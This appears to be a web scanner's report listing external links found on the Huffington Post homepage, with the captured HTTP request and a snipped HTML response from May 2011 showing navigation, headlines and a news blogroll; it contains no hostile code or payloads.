http://s.huffpost.com/images/loader.gif
http://s.huffpost.com/images/modal/close-home.gif
http://s.huffpost.com/images/quickview/gear_animation.gif
http://s.huffpost.com/images/social-profile/lightbox/huffpo_logo_lightbox_beta.png
http://s.huffpost.com/images/v/blog_column.png
http://s.huffpost.com/images/v/logos/logo_homepage_hp.gif?nv3
http://s.huffpost.com/images/v/something_to_say_button.png
http://s.huffpost.com/images/webslice12x12.png
http://secure-us.imrworldwide.com/cgi-bin/m?ci=us-703240h&cg=0&cc=1&ts=noscript
http://sixapart.com/
http://slate.msn.com/?id=3944&cp=68090&nav=navom
http://talkleft.com/
http://techcrunch.com/
http://television.aol.com/
http://thehill.com/
http://themoderatevoice.com/
http://time-blog.com/swampland/
http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/davidbrooks/index.html
http://translogic.aolautos.com/
http://vertical-stats.huffpost.com/?-1&&
http://video.aol.com/
http://wsj.com/
http://www.accesshollywood.com/
http://www.autoblog.com/
http://www.bagnewsnotes.com/
http://www.bloomberg.com/
http://www.boston.com/news/globe/
http://www.buzzfeed.com/
http://www.buzzmachine.com/
http://www.c-span.org/
http://www.cbsnews.com/
http://www.chicagotribune.com/
http://www.cnn.com/
http://www.comicsalliance.com/
http://www.cq.com/
http://www.crooksandliars.com/
http://www.csmonitor.com/
http://www.davidcorn.com/
http://www.democracynow.org/
http://www.engadget.com/
http://www.eonline.com/
http://www.ew.com/
http://www.forbes.com/
http://www.foxnews.com/
http://www.frumforum.com/
http://www.funnyordie.com/
http://www.games.com/
http://www.globalpost.com/
http://www.globalvoicesonline.org/
http://www.gothamist.com/
http://www.guardian.co.uk/
http://www.hitchensweb.com/
http://www.instapundit.com/
http://www.joystiq.com/
http://www.juancole.com/
http://www.kcrw.com/news/programs/lr
http://www.kitchendaily.com/
http://www.kottke.org/
http://www.latimes.com/
http://www.linktv.org/mosaic/
http://www.mapquest.com/
http://www.marketwatch.com/News/Story/Story.aspx?column=Jon+Friedman%27s+Media+Web&siteid=mktw&dist=
http://www.mcclatchydc.com/
http://www.mediaite.com/
http://www.mmafighting.com/
http://www.motherjones.com/
http://www.msnbc.msn.com/
http://www.nationaljournal.com/columns/political-connections
http://www.nationalreview.com/lowry/lowry.asp/
http://www.nationalreview.com/thecorner/corner.asp
http://www.ndnblog.com/
http://www.newser.com/off-the-grid/author/16/michael-wolff.html
http://www.newsweek.com/
http://www.newsweek.com/blogs/kausfiles.html
http://www.npr.org/
http://www.nydailynews.com/topics/Stanley+Crouch
http://www.nytimes.com/
http://www.nytimes.com/2011/05/04/us/politics/04torture.html
http://www.observer.com/
http://www.observer.com/opinions_conason.asp
http://www.opinionjournal.com/diary/
http://www.pandagon.net/
http://www.patch.com/
http://www.pbs.org/newshour/
http://www.people.com/people
http://www.politico.com/
http://www.popeater.com/
http://www.propublica.org/
http://www.prospect.org/weblog/
http://www.publicintegrity.org/
http://www.rawstory.com/
http://www.reuters.com/
http://www.reuters.com/subjects/bin-laden-compound
http://www.rollcall.com/
http://www.salon.com/
http://www.seeingtheforest.com/
http://www.sfgate.com/
http://www.shelterpop.com/
http://www.slate.com/
http://www.slate.com/blogs/blogs/weigel/
http://www.stylelist.com/
http://www.suntimes.com/
http://www.talkingpointsmemo.com/
http://www.taylormarsh.com/
http://www.telegraph.co.uk/
http://www.thatminoritything.com/
http://www.theatlantic.com/
http://www.theatlantic.com/james-fallows/
http://www.theatlantic.com/joshua-green/
http://www.thedailybeast.com/author/howard-kurtz/
http://www.theglobeandmail.com/
http://www.thenation.com/authors/eric-alterman
http://www.thenation.com/blogs/notion
http://www.thenation.com/blogs/thebeat
http://www.theroot.com/
http://www.theyoungturks.com/
http://www.thinkprogress.org/
http://www.thismodernworld.com/
http://www.time.com/time/?xid=huffpo-direct
http://www.timesonline.co.uk/section/0,,3,00.html
http://www.tmz.com/
http://www.truthdig.com/
http://www.tuaw.com/
http://www.usatoday.com/
http://www.usnews.com/usnews/politics/whispers/whisphome.htm
http://www.vanityfair.com/
http://www.vanityfair.com/online/wolcott
http://www.washingtonindependent.com/
http://www.washingtonmonthly.com/
http://www.washingtonpost.com/
http://www.washingtonpost.com/wp-dyn/content/linkset/2005/03/24/LI2005032402294.html
http://www.washingtonpost.com/wp-dyn/content/linkset/2005/04/22/LI2005042201099.html
http://www.washingtontimes.com/
http://www.wonkette.com/
http://www.youthradio.org/

Request

GET /?icid=navbar_huffpo_main5 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=30
Date: Thu, 05 May 2011 01:15:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 268468

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
<link rel="shortcut icon" href="/favicon.ico" />

       <link rel="stylesheet" href="http://s.huffpost.com/assets/css.php?f=fonts%2Fhelvetica%2Fstylesheet.css%2Chp_modules%2Ftop_nav.css%2Cverticals%2Fhomepage.css%2Cfrontpage.css%2Cbasic.css%2Call_pages.css%2Cverticals%2Fcolor_scheme.css%2Cadd%2Ffront.css%2Cbuttons.css%2Cmost_popular.css&v46770" type="text/css" media="screen" /><link rel="stylesheet" href="http://s.huffpost.com/assets/css.php?f=commercial.css%2Csnp_friends.css%2Csnn-header.css%2Chp_modules%2Fmodule.splash_slideshow.css%2Chp_modules%2Fmodule.apps_feeds.css%2Chufflists.css%2Csignup_modal.css%2Cdirect_message.css%2Cbadges_v2.css%2Chp_modules%2Ffacebook.css%2Cuser_levels.css%2Ctwitter_splash.css%2Cbing.css%2Cgrouping.css%2Cmodal_frames.css%2Chp_modules%2Fmodule.bubble.css%2Cemail_share.css&v46755" type="text/css" media="screen" />

<link rel="alternate" type="application/rss+xml" title="The Full Feed" href="http://feeds.huffingtonpost.com/huffingtonpost/raw_feed" />
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Wire Services" href="http://www.huffingtonpost.com/wires/full_index.rdf" />
       <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js" ></script>

       <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Cflashobjectmin.js%2Cjsonmin.js%2Ccookiesmin.js%2Cv%2Fblogroll.js%2Chp_track.js%2Chp_util.js%2Cjquery%2Fcolor.jquery.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cjquery%2Fjquery.jdMenu.js%2Cprovider.js%2Cquickview.js%2Cshare.js%2Cposts.js%2Crefresh.js%2Cmost_popular.js%2Cfacebook.js%2Cgeopromo.js%2Csnproject.js%2Clazyload-min.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Cbalance_columns.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csitemode.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Csplash_slideshow.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Cuser_levels.js%2Ctwitter_splash.js%2Csharer.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Ctwitter%2Ffrontpage.js%2Chptwitter.js%2Capp-feeds.js&v47007"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=v.js&v47014"></script>


<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
<h1>Using a mobile device? Go to <a href="http://m.huffpost.com">m.huffpost.com</a>
...[SNIP]...
<div class="huffpo_logo_lightbox">
                           <img src="http://s.huffpost.com/images/social-profile/lightbox/huffpo_logo_lightbox_beta.png" width="368" height="36" alt="" />
                       </div>
...[SNIP]...
<div id="huffpo_snn_is_loading" style="width:100%; text-align:center;"><img width="32" height="32" src="http://s.huffpost.com/images/loader.gif" alt="" /></div>
...[SNIP]...
<div id="qr_tab_read_col1" class="column first">
<img class="spinner" alt="" src="http://s.huffpost.com/images/quickview/gear_animation.gif" width="32" height="32" />
</div>
...[SNIP]...
<div id="qr_tab_news_col1" class="column first">
<img class="spinner" alt="" src="http://s.huffpost.com/images/quickview/gear_animation.gif" width="32" height="32" />
</div>
...[SNIP]...

           <img src="http://s.huffpost.com/images/v/logos/logo_homepage_hp.gif?nv3" alt="The Huffington Post" width="660" height="70" />


...[SNIP]...
<li class="center" style="border-right:medium none; width:138px;">
                   <a href="http://www.autoblog.com/" class="black border_dotted_ccc">AUTOBLOG</a>
...[SNIP]...
</a>
                   <a href="http://music.aol.com/" class="black border_dotted_ccc">MUSIC</a>
                   <a href="http://www.popeater.com/" class="black">POPEATER</a>
...[SNIP]...
<li class="center" style="border-right:medium none; width:115px;">
                   <a href="http://moviefone.com/" class="black border_dotted_ccc">MOVIEFONE</a>
                   <a href="http://television.aol.com/" class="black border_dotted_ccc">TV</a>
                   <a href="http://video.aol.com/" class="black">VIDEO</a>
...[SNIP]...
</a>
                   <a href="http://www.engadget.com/" class="black border_dotted_ccc">ENGADGET</a>
                   <a href="http://www.tuaw.com/" class="black">APPLE BLOG</a>
...[SNIP]...
<li class="center" style="border-right:medium none; width:120px;">
                   <a href="http://techcrunch.com/" class="black border_dotted_ccc">TECHCRUNCH</a>
                   <a href="http://www.joystiq.com/" class="black border_dotted_ccc">JOYSTIQ</a>
                   <a href="http://translogic.aolautos.com/" class="black">TRANSLOGIC</a>
...[SNIP]...
</a>
                   <a href="http://www.comicsalliance.com/" class="black">COMICS</a>
...[SNIP]...
</a>
                   <a href="http://www.mmafighting.com/" class="black">MMA FIGHTING</a>
...[SNIP]...
</a>
                   <a href="http://www.shelterpop.com/" class="black">HOME/DIY</a>
...[SNIP]...
<li class="center" style="border-right:medium none; width:90px;">
                   <a href="http://www.stylelist.com/" class="black border_dotted_ccc">STYLELIST</a>
...[SNIP]...
</a>
                   <a href="http://www.kitchendaily.com" class="black">RECIPES</a>
...[SNIP]...
</a>
                   <a href="http://www.patch.com/" class="black border_dotted_ccc">PATCH</a>
                   <a href="http://www.mapquest.com/" class="black">MAPQUEST</a>
...[SNIP]...
<li class="n_default"><a href="http://www.games.com/">GAMES</a>
...[SNIP]...
<li class="n_default"><a href="http://music.aol.com/">AOL MUSIC</a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html" id="entry_id_0" >

                                                                                   <img id="headline_image" class="quickread_link" width="900" height="350" src="http://i.huffpost.com/gen/273980/thumbs/r-BARACK-OBAMA-OSAMA-BIN-LADEN-huge.jpg" />
                                                                                                   </a>
...[SNIP]...
<a href="#" onclick="javascript:window.external.AddToFavoritesBar('http://www.huffingtonpost.com/webslices/?v=home#home_slice', 'Home', 'slice');">
       <img src="http://s.huffpost.com/images/webslice12x12.png" width="12" height="12" alt="IE8 Web Slice" />
   </a>
...[SNIP]...
<div class="float_left" style="width:45px; height:31px; margin:0 5px;"><img src="http://s.huffpost.com/images/v/blog_column.png" width="44" height="31" /></div>
...[SNIP]...
<a href="/arianna-huffington"><img src="http://s.huffpost.com/contributors/arianna-huffington/headshot.jpg" width="45" height="45" alt="Arianna Huffington" /></a>
...[SNIP]...
<h4><a href="http://www.reuters.com/subjects/bin-laden-compound" target="_hplink">Photos Show 3 Dead Men At Bin Laden Compound (GRAPHIC)</a>
...[SNIP]...
<div class="image_wrapper "><a href="http://www.reuters.com/subjects/bin-laden-compound" target="_hplink"><img class="unloaded-image quickread_link" id="image_857719" longdesc="http://i.huffpost.com/gen/273951/thumbs/s-OSAMA-BIN-LADEN-PHOTOS-large300.jpg" alt="Osama Bin Laden Photos" width="300" height="21
...[SNIP]...
<h4 class="subhead"><a href="http://www.reuters.com/subjects/bin-laden-compound" target="_hplink"></a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/administration-bin-laden-waterboarding_n_857529.html"><a href="http://www.nytimes.com/2011/05/04/us/politics/04torture.html"><em>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/william-h-mcraven-univers_n_857584.html"><img src="http://s.huffpost.com/images/hoton_twitter3.png" width="45" height="45" /></a>
...[SNIP]...
<span class="afb-icon">
       <img class="apps-feeds_image" alt="Facebook" src="http://s.huffpost.com/images/blank.gif"/>
    </span>
...[SNIP]...
<span class="afb-icon">
                   <img class="apps-feeds_image" alt="Twitter" src="http://s.huffpost.com/images/blank.gif"/>
               </span>
...[SNIP]...
<span class="afb-icon" >
       <img class="apps-feeds_image" alt="Apple" src="http://s.huffpost.com/images/blank.gif"/>
               </span>
...[SNIP]...
<a class="afb-icon" onclick="HPTrack.Module('follow').click('Android');" href="/p/huffingtonpost-android-ap.html" target="_blank">
       <img class="apps-feeds_image" alt="Android" src="http://s.huffpost.com/images/blank.gif"/>
    </a>
...[SNIP]...
<li id="af-blackberry" class="apps-feeds_button">
    <a class="afb-icon" onclick="HPTrack.Module('follow').click('Blackberry');" href="http://appworld.blackberry.com/webstore/content/19143" target="_blank">
       <img class="apps-feeds_image" alt="Blackberry" src="http://s.huffpost.com/images/blank.gif"/>
       </a>
...[SNIP]...
<a class="afb-icon" href="/subscription/" onclick="HPTrack.Module('follow').click('Email'); QuickSubscribeUser.pop2(); return false;" target="_blank">
                   <img class="apps-feeds_image" alt="Email" src="http://s.huffpost.com/images/blank.gif"/>
               </a>
...[SNIP]...
<a class="afb-icon" onclick="HPTrack.Module('follow').click('Rss');" href="/syndication/" target="_blank">
       <img class="apps-feeds_image" alt="Rss" src="http://s.huffpost.com/images/blank.gif"/>
    </a>
...[SNIP]...
<a href="#" id="facebook_promo_link"><img src="http://s.huffpost.com/images/facebook_promo_connect.png?3" class="facebook_promo_connect" width="230" height="44" /></a>
...[SNIP]...
<div class="snn_twitter_loading_img"><img width="32" height="32" src="http://s.huffpost.com/images/loader.gif" alt="" /></div>
...[SNIP]...
<div class="snp_most_popular_entry_image">
       <a href="http://royalwedding.aol.com/2011/05/02/pippa-middleton-boyfriend-engagement/" class="track_lightbox_quickread" onclick="return QV.pop(this); return false;">
                           <img border="0" src="/images/trans.gif" longdesc="http://www.blogcdn.com/royalwedding.aol.com/media/2011/05/pippa10facts_74x58.jpg" alt="" class="img_border unloaded-image" />
...[SNIP]...
<div class="snp_most_popular_entry_desc">
       <a class="arial_13 black bold snp_entry_title track_lightbox_quickread" onclick="return QV.pop(this); return false;" href="http://royalwedding.aol.com/2011/05/02/pippa-middleton-boyfriend-engagement/">AOL Royal Wedding: 10 Things You Should Know About Pippa Middleton</a>
...[SNIP]...
<div class="snp_most_popular_entry_image">
       <a href="http://realestate.aol.com/blog/2011/05/02/real-estate-tough-sell-the-too-custom-home/" class="track_lightbox_quickread" onclick="return QV.pop(this); return false;">
                           <img border="0" src="/images/trans.gif" longdesc="http://www.blogcdn.com/realestate.aol.com/blog/media/2011/05/3843-22nd-st-pool-1304375357_74x58.jpg" alt="" class="img_border unloaded-image" /
...[SNIP]...
<div class="snp_most_popular_entry_desc">
       <a class="arial_13 black bold snp_entry_title track_lightbox_quickread" onclick="return QV.pop(this); return false;" href="http://realestate.aol.com/blog/2011/05/02/real-estate-tough-sell-the-too-custom-home/">AOL Real Estate: Real Estate Tough Sell: The Too-Custom Home</a>
...[SNIP]...
<a href="#" onclick="SayIt.pop_email_form(); return false;">
           <img src="http://s.huffpost.com/images/v/something_to_say_button.png" width="300" height="58" alt="If you have something to say... Say it on the Huffington Post" />
       </a>
...[SNIP]...
<h4><a href="http://news.travel.aol.com/2011/05/04/iurii-chumak-drunk-british-airways-passenger-gropes-flight-att/" target="_hplink">Drunk British Airways Passenger Reportedly Gropes Flight Attendant</a>
...[SNIP]...
<div class="image_wrapper "><a href="http://news.travel.aol.com/2011/05/04/iurii-chumak-drunk-british-airways-passenger-gropes-flight-att/" target="_hplink"><img class="unloaded-image quickread_link" id="image_857316" longdesc="http://i.huffpost.com/gen/274035/thumbs/s-ALCOHOL-large300.jpg" alt="Alcohol" width="300" height="219" src="/images/trans.gif" />
...[SNIP]...
<h4 class="subhead"><a href="http://news.travel.aol.com/2011/05/04/iurii-chumak-drunk-british-airways-passenger-gropes-flight-att/" target="_hplink"></a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/panda-peacock-animal-chase_n_857572.html"><img src="http://s.huffpost.com/images/hoton_twitter3.png" width="45" height="45" /></a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/unemployment-up-divorce-down_n_857503.html"><img src="http://s.huffpost.com/images/hoton_twitter3.png" width="45" height="45" /></a>
...[SNIP]...
<h4><a href="http://aol.com/video/930944537001" target="_hplink">Proof That Some Dogs Can Talk?</a>
...[SNIP]...
<div class="image_wrapper "><a href="http://aol.com/video/930944537001" target="_hplink"><img class="unloaded-image quickread_link" id="image_857475" longdesc="http://i.huffpost.com/gen/273725/thumbs/s-DOG-large300.jpg" alt="Dog" width="300" height="219" src="/images/trans.gif" />
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/03/mac-os-x-tips-tricks_n_855102.html"><img src="http://s.huffpost.com/images/hoton_twitter3.png" width="45" height="45" /></a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/jon-stewart-rips-pakistan_n_857329.html"><img src="http://s.huffpost.com/images/hoton_twitter3.png" width="45" height="45" /></a>
...[SNIP]...
<li><a href="http://abcnews.go.com/" target="_blank">ABC</a></li>
<li><a href="http://www.accesshollywood.com" target="_blank">Access Hollywood</a>
...[SNIP]...
<li><a href="http://english.aljazeera.net/" target="_blank">Al Jazeera</a>
...[SNIP]...
<li><a href="http://news.aol.com/" target="_blank">AOL News</a>
...[SNIP]...
<li><a href="http://www.theatlantic.com/" target="_blank">The Atlantic</a>
...[SNIP]...
<li><a href="http://news.bbc.co.uk/" target="_blank">BBC</a></li>
<li><a href="http://www.bloomberg.com/" target="_blank">Bloomberg</a></li>
<li><a href="http://www.boston.com/news/globe/" target="_blank">Boston Globe</a>
...[SNIP]...
<li><a href="http://www.c-span.org" target="_blank">C-SPAN</a></li>
<li><a href="http://www.cbsnews.com/" target="_blank">CBS</a></li>
<li><a href="http://www.suntimes.com/" target="_blank">Chicago Sun-Times</a>
...[SNIP]...
<li><a href="http://www.chicagotribune.com/" target="_blank">Chicago Tribune</a>
...[SNIP]...
<li><a href="http://www.csmonitor.com/" target="_blank">Christian Science Monitor</a>
...[SNIP]...
<li><a href="http://www.publicintegrity.org/" target="_blank">Center for Public Integrity</a>
...[SNIP]...
<li><a href="http://www.cnn.com/" target="_blank">CNN</a></li>
<li><a href="http://www.cq.com" target="_blank">Congressional Quarterly</a>
...[SNIP]...
<li><a href="http://www.telegraph.co.uk/" target="_blank">Daily Telegraph</a>
...[SNIP]...
<li><a href="http://www.democracynow.org/" target="_blank">Democracy Now!</a>
...[SNIP]...
<li><a href="http://drudgereport.com/" target="_blank">Drudge Report</a>
...[SNIP]...
<li><a href="http://www.eonline.com/" target="_blank">E! Online</a></li>
<li><a href="http://www.ew.com/" target="_blank">Entertainment Weekly</a>
...[SNIP]...
<li><a href="http://www.forbes.com/" target="_blank">Forbes</a></li>
<li><a href="http://money.cnn.com/magazines/fortune/" target="_blank">Fortune</a>
...[SNIP]...
<li><a href="http://www.foxnews.com/" target="_blank">Fox News</a></li>
<li><a href="http://news.ft.com/home/us" target="_blank">Financial Times</a>
...[SNIP]...
<li><a href="http://www.theglobeandmail.com/" target="_blank">Globe and Mail</a>
...[SNIP]...
<li><a href="http://www.GlobalPost.com" target="_blank">GlobalPost.com</a>
...[SNIP]...
<li><a href="http://www.globalvoicesonline.org/" target="_blank">GlobalVoices</a>
...[SNIP]...
<li><a href="http://news.google.com/" target="_blank">Google News</a>
...[SNIP]...
<li><a href="http://www.guardian.co.uk/" target="_blank">Guardian</a></li>
<li><a href="http://thehill.com/" target="_blank">The Hill</a></li>
<li><a href="http://news.independent.co.uk/" target="_blank">Independent</a>
...[SNIP]...
<li><a href="http://www.latimes.com/" target="_blank">Los Angeles Times</a>
...[SNIP]...
<li><a href="http://www.mcclatchydc.com/" target="_blank">McClatchy</a></li>
<li><a href="http://www.mediaite.com/" target="_blank">Mediaite</a></li>
<li><a href="http://www.linktv.org/mosaic/" target="_blank">Mosaic</a></li>
<li><a href="http://www.motherjones.com/" target="_blank">Mother Jones</a>
...[SNIP]...
<li><a href="http://www.msnbc.msn.com/" target="_blank">MSNBC</a></li>
<li><a href="http://nydailynews.com/" target="_blank">New York Daily News</a>
...[SNIP]...
<li><a href="http://www.observer.com/" target="_blank">New York Observer</a>
...[SNIP]...
<li><a href="http://www.nytimes.com/" target="_blank">New York Times</a>
...[SNIP]...
<li><a href="http://www.npr.org/" target="_blank">NPR</a></li>
<li><a href="http://www.pbs.org/newshour/" target="_blank">PBS NewsHour</a>
...[SNIP]...
<li><a href="http://www.newsweek.com" target="_blank">Newsweek</a></li>
<li><a href="http://www.people.com/people" target="_blank">People</a></li>
<li><a href="http://www.politico.com/" target="_blank">Politico</a></li>
<li><a href="http://www.propublica.org/"target="_blank">ProPublica</a>
...[SNIP]...
<li><a href="http://www.reuters.com/" target="_blank">Reuters</a>
...[SNIP]...
<li><a href="http://www.rollcall.com/" target="_blank">Roll Call</a></li>
<li><a href="http://rollingstone.com" target="_blank">Rolling Stone</a>
...[SNIP]...
<li><a href="http://www.theroot.com" target="_blank">The Root</a></li>
<li><a href="http://www.salon.com/" target="_blank">Salon</a></li>
<li><a href="http://www.sfgate.com/" target="_blank">San Francisco Chronicle</a>
...[SNIP]...
<li><a href="http://www.slate.com/" target="_blank">Slate</a></li>
<li><a href="http://reporting.sunlightfoundation.com/blog/" target="_blank">Sunlight Foundation</a>
...[SNIP]...
<li><a href="http://www.time.com/time/?xid=huffpo-direct" target="_blank">TIME</a></li>
<li><a href="http://www.timesonline.co.uk/section/0,,3,00.html" target="_blank">Times Of London</a>
...[SNIP]...
<li><a href="http://www.tmz.com" target="_blank">TMZ</a></li>
<li><a href="http://www.usatoday.com/" target="_blank">USA Today</a></li>
<li><a href="http://www.vanityfair.com/" target="_blank">Vanity Fair</a>
...[SNIP]...
<li><a href="http://wsj.com/" target="_blank">Wall Street Journal</a>
...[SNIP]...
<li><a href="http://www.washingtonindependent.com/" target="_blank">Washington Independent</a>
...[SNIP]...
<li><a href="http://www.washingtontimes.com/" target="_blank">Washington Times</a>
...[SNIP]...
<li><a href="http://www.washingtonpost.com/" target="_blank">Washington Post</a>
...[SNIP]...
<li><a href="http://news.yahoo.com/" target="_blank">Yahoo! News</a>
...[SNIP]...
<li><a href=http://www.youthradio.org/>Youth Radio</a>
...[SNIP]...
<li><a href="http://americablog.blogspot.com/" target="_blank">Americablog</a>
...[SNIP]...
<li><a href="http://andrewsullivan.theatlantic.com/" target="_blank">Andrew Sullivan</a>
...[SNIP]...
<li><a href="http://www.bagnewsnotes.com/" target="_blank">BagNewsNotes</a>
...[SNIP]...
<li><a href="http://bloggingheads.tv/" target="_blank">Bloggingheads</a>
...[SNIP]...
<li><a href="http://boingboing.net/" target="_blank">Boing Boing</a>
...[SNIP]...
<li><a href="http://bravenewfilms.org/" target="_blank">Brave New Films</a>
...[SNIP]...
<li><a href="http://www.buzzfeed.com/" target="_blank">BuzzFeed</a></li>
<li><a href="http://www.buzzmachine.com/" target="_blank">BuzzMachine</a>
...[SNIP]...
<li><a href="http://www.nationalreview.com/thecorner/corner.asp" target="_blank">The Corner (National Review)</a>
...[SNIP]...
<li><a href="http://mediamatters.org/blog/" target="_blank">County Fair (Media Matters)</a>
...[SNIP]...
<li><a href="http://www.crooksandliars.com/" target="_blank">Crooks and Liars</a>
...[SNIP]...
<li><a href="http://dailycaller.com/" target="_blank">Daily Caller</a>
...[SNIP]...
<li><a href="http://dailykos.com/" target="_blank">Daily Kos</a></li>
<li><a href="http://www.slate.com/blogs/blogs/weigel/" target="_blank">David Weigel</a>
...[SNIP]...
<li><a href="http://democracyarsenal.org/" target="_blank">Democracy Arsenal</a>
...[SNIP]...
<li><a href="http://blogs.reuters.com/felix-salmon/" target="_blank">Felix Salmon</a>
...[SNIP]...
<li><a href="http://firedoglake.com/" target="_blank">Firedoglake</a>
...[SNIP]...
<li><a href="http://fivethirtyeight.blogs.nytimes.com/" target="_blank">FiveThirtyEight</a>
...[SNIP]...
<li><a href="http://www.FrumForum.com" target="_blank">FrumForum</a></li>
<li><a href="http://www.funnyordie.com/" target="_blank">Funny or Die</a>
...[SNIP]...
<li><a href="http://blogs.abcnews.com/george/" target="_blank">George's Bottom Line (George Stephanopoulos)</a>
...[SNIP]...
<li><a href="http://www.gothamist.com" target="_blank">Gothamist</a></li>
<li><a href="http://hotlineblog.nationaljournal.com/" target="_blank">Hotline On Call (National Journal)</a>
...[SNIP]...
<li><a href="http://digbysblog.blogspot.com/">Hullabaloo</a>
...[SNIP]...
<li><a href="http://www.juancole.com/" target="_blank">Informed Comment</a>
...[SNIP]...
<li><a href="http://www.instapundit.com/" target="_blank">Instapundit</a>
...[SNIP]...
<li><a href="http://www.theatlantic.com/james-fallows/" target="_blank">James Fallows</a>
...[SNIP]...
<li><a href="http://www.vanityfair.com/online/wolcott" target="_blank">James Wolcott (Vanity Fair)</a>
...[SNIP]...
<li><a href="http://www.theatlantic.com/joshua-green/" target="_blank">Joshua Green</a>
...[SNIP]...
<li><a href="http://www.newsweek.com/blogs/kausfiles.html" target="_blank">Kausfiles (Newsweek)</a>
...[SNIP]...
<li><a href="http://www.kottke.org/" target="_blank">kottke.org</a>
...[SNIP]...
<li><a href="http://www.kcrw.com/news/programs/lr" target="_blank">Left, Right and Center</a>
...[SNIP]...
<li><a href="http://themoderatevoice.com/" target="_blank">The Moderate Voice</a>
...[SNIP]...
<li><a href="http://www.ndnblog.com" target="_blank">NDN Blog</a></li>
<li><a href="http://www.thenation.com/blogs/notion" target="_blank">The Notion (Nation)</a>
...[SNIP]...
<li><a href="http://www.pandagon.net/" target="_blank">Pandagon</a></li>
<li><a href="http://krugman.blogs.nytimes.com/" target="_blank">Paul Krugman</a>
...[SNIP]...
<li><a href="http://www.washingtonmonthly.com/" target="_blank">Political Animal (Washington Monthly)</a>
...[SNIP]...
<li><a href="http://politicalwire.com/" target="_blank">Political Wire</a>
...[SNIP]...
<li><a href="http://www.rawstory.com" target="_blank">Raw Story</a></li>
<li><a href="http://redstate.com/" target="_blank">Redstate.com</a>
...[SNIP]...
<li><a href="http://www.seeingtheforest.com/" target="_blank">Seeing The Forest</a>
...[SNIP]...
<li><a href="http://time-blog.com/swampland/" target="_blank">Swampland (Time)</a>
...[SNIP]...
<li><a href="http://talkleft.com/" target="_blank">TalkLeft</a></li>
<li><a href="http://www.talkingpointsmemo.com/" target="_blank">Talking Points Memo</a>
...[SNIP]...
<li><a href="http://www.prospect.org/weblog/" target="_blank">Tapped (American Prospect)</a>
...[SNIP]...
<li><a href="http://www.taylormarsh.com/" target="_blank">Taylor Marsh</a>
...[SNIP]...
<li><a href="http://www.thatminoritything.com/" target="_blank">That Minority Thing</a>
...[SNIP]...
<li><a href="http://www.truthdig.com/" target="_blank">Truthdig</a></li>
<li><a href="http://www.thinkprogress.org/" target="_blank">Think Progress</a>
...[SNIP]...
<li><a href="http://www.thismodernworld.com/" target="_blank">This Modern World</a>
...[SNIP]...
<li><a href="http://www.usnews.com/usnews/politics/whispers/whisphome.htm" target="_blank">Washington Whispers (US News & World Report)</a>
...[SNIP]...
<li><a href="http://www.wonkette.com/" target="_blank">Wonkette</a></li>
<li><a href="http://www.theyoungturks.com/" target="_blank">The Young Turks</a>
...[SNIP]...
<li><a href="http://www.thenation.com/authors/eric-alterman" target="_blank">Eric Alterman</a>
...[SNIP]...
<li><a href="http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/davidbrooks/index.html" target="_blank">David Brooks</a>
...[SNIP]...
<li><a href="http://www.nationaljournal.com/columns/political-connections">Ron Brownstein</a>
...[SNIP]...
<li><a href="http://www.observer.com/opinions_conason.asp" target="_blank">Joe Conason</a>
...[SNIP]...
<li><a href="http://www.davidcorn.com" target="_blank">David Corn</a>
...[SNIP]...
<li><a href="http://www.nydailynews.com/topics/Stanley+Crouch" target="_blank">Stanley Crouch</a>
...[SNIP]...
<li><a href="http://www.washingtonpost.com/wp-dyn/content/linkset/2005/04/22/LI2005042201099.html" target="_blank">EJ Dionne</a></li>
<li><a href="http://www.marketwatch.com/News/Story/Story.aspx?column=Jon+Friedman%27s+Media+Web&siteid=mktw&dist=" target="_blank">Jon Friedman</a>
...[SNIP]...
<li><a href="http://www.opinionjournal.com/diary/" target="_blank">John Fund</a></li>
<li><a href="http://www.thedailybeast.com/author/howard-kurtz/" target="_blank">Howard Kurtz</a>
...[SNIP]...
<li><a href="http://www.hitchensweb.com/" target="_blank">Christopher Hitchens</a>
...[SNIP]...
<li><a href="http://www.nationalreview.com/lowry/lowry.asp/" target="_blank">Rich Lowry</a>
...[SNIP]...
